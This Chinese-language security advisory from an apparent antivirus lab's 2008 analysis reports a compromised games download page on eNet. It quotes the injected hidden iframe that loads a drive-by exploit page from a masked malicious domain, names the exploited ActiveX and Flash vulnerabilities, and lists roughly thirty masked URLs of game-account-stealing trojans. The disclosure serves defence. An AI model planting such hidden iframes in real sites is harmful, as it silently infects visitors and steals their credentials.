安天防线
安天防线主页 安天防线使用指南 安天防线软件下载 安天防线在线安装 安天防线产品升级 安天防线产品购买 安天防线客户服务 安天防线安全资讯 安天防线论坛交流
首  页   使用指南   软件下载   在线安装   产品升级   产品购买   客户服务   安全资讯   论坛交流
安天防线免费下载
安天防线在线安装
安天防线产品升级
安天防线产品购买
 
eNet硅谷动力网站游戏先锋频道挂马事件
 
出处:安天病毒分析组 2008-11-19
 

  11月19日,安天实验室发现,eNet硅谷动力网站游戏先锋频道(http://games.enet.com.cn/download/D0320080916001.html)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息,甚至导致死机。
该网站问题代码:

<iframe src=http://baidu.bai****.cn/w06/w06.htm width=100 height=0></iframe>
http://baidu.bai****.cn/w06/w06.htm 问题框架代码:

<iframe width=100 height=0 src=new.html></iframe>
http://baidu.bai****.cn/w06/new.html问题框架代码:

该加密网马解密后可知利用以下漏洞来传播:
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
暴风影音播放器MPS.StormPlayer漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
Real Networks RealPlayer包含的'rmoc3260.dll' ActiveX控件存在内存破坏漏洞
Adobe Flash Player SWF文件漏洞

当用户访问http://games.enet.com.cn/download/D0320080916001.html时,系统会自动下载以下病毒文件:
http://qq.caog****.cn/ma/cw02.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://qq.caog****.cn/ma/sw02.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://qq.caog****.cn/ma/sw03.exe 病毒名:(Trojan-GameThief.Win32.OnLineGames.tqly)
http://qq.caog****.cn/ma/cw03.exe 病毒名:(Trojan-GameThief.Win32.OnLineGames.ttgu)
http://qq.caog****.cn/ma/cw04.exe 病毒名:(Trojan-GameThief.Win32.OnLineGames.tskf)
http://qq.caog****.cn/ma/cw05.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://qq.caog****.cn/ma/cw06.exe 病毒名:(Trojan-GameThief.Win32.OnLineGames.ttgu)
http://qq.caog****.cn/ma/cw07.exe 病毒名:(Trojan-GameThief.Win32.OnLineGames.ttgu)
http://qq.caog****.cn/ma/cw08.exe 病毒名:(Trojan-GameThief.Win32.OnLineGames.atzu)
http://qq.caog****.cn/ma/cw09.exe 病毒名:(Trojan-GameThief.Win32.OnLineGames.ttgu)
http://qq.caog****.cn/ma/cw10.exe 病毒名:(Trojan-GameThief.Win32.Magania.akrf)
http://qq.caog****.cn/ma/cw11.exe 病毒名:(Trojan-GameThief.Win32.Magania.akrf)
http://qq.caog****.cn/ma/cw12.exe 病毒名:(Trojan-GameThief.Win32.Magania.akrf)
http://qq.caog****.cn/ma/cw13.exe 病毒名:(Trojan-GameThief.Win32.Magania.akrf)
http://qq.caog****.cn/ma/cw14.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw15.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw16.exe 病毒名:(Trojan-GameThief.Win32.Magania.agms)
http://qq.caog****.cn/ma/cw17.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw18.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw19.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw20.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw21.exe 病毒名:(Trojan-GameThief.Win32.Magania.akrf)
http://qq.caog****.cn/ma/cw22.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw23.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw24.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw25.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://qq.caog****.cn/ma/cw26.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://qq.caog****.cn/ma/cw27.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://qq.caog****.cn/ma/cw28.exe 病毒名:(Trojan-GameThief.Win32.Magania.akms)
http://qq.caog****.cn/ma/cw29.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://qq.caog****.cn/ma/cw30.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://qq.caog****.cn/ma/cw31.exe 病毒名:(Trojan-GameThief.Win32.Magania.gen)
    以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。